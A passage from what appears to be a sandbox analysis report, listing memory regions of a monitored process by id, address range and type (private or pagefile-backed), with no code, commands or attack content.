end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 5377 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 5378 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 5379 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 5380 start_va = 0x9870000 end_va = 0x9d61fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009870000" filename = "" Region: id = 5381 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 5382 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 5383 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 5384 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 5385 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 5386 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 5387 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 5388 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 5389 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 5390 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 5391 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 5392 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 5393 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 5394 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 5395 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 5396 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 5397 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 5398 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 5399 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 5400 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 5401 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 5402 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 5403 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 5404 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 5405 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 5406 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 5407 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 5408 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 5409 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 5410 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 5411 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 5412 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 5413 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 5414 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 5415 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 5416 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 5417 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 5418 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 5419 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 5420 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 5421 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 5422 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 5423 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 5424 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 5425 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 5426 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 5427 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 5428 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 5429 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 5430 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 5431 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 5432 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 5433 start_va = 0x1e80000 end_va = 0x1e8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e80000" filename = "" Region: id = 5434 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 5435 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 5436 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 5437 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 5438 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 5439 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 5440 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 5441 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 5442 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 5443 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 5444 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 5445 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 5446 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 5447 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 5448 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 5449 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 5450 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 5451 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 5452 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 5453 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 5454 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 5455 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 5456 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 5457 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 5458 start_va = 0x610000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 5459 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 5460 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 5461 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 5462 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 5463 start_va = 0x1e80000 end_va = 0x1e8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e80000" filename = "" Region: id = 5464 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 5465 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 5466 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 5467 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 5468 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 5469 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 5470 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 5471 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 5472 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 5473 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 5474 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 5475 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 5476 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 5477 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 5478 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 5479 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 5480 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 5481 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 5482 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 5483 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 5484 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 5485 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 5486 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 5487 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 5488 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 5489 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 5490 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 5491 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 5492 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 5493 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 5494 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 5495 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 5496 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 5497 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 5498 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 5499 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 5500 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 5501 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 5502 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 5503 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 5504 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 5505 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 5506 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 5507 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 5508 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 5509 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 5510 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 5511 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 5512 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 5513 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 5514 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 5515 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 5516 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 5517 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 5518 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 5519 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 5520 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 5521 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 5522 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 5523 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 5524 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 5525 start_va = 0x1e80000 end_va = 0x1e8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e80000" filename = "" Region: id = 5526 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 5527 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 5528 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 5529 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 5530 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 5531 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 5532 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 5533 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 5534 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 5535 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 5536 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 5537 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 5538 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 5539 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 5540 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 5541 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 5542 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 5543 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 5544 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 5545 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 5546 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 5547 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 5548 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 5549 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 5550 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 5551 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 5552 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 5553 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 5554 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 5555 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 5556 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 5557 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 5558 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 5559 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 5560 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 5561 start_va = 0x610000 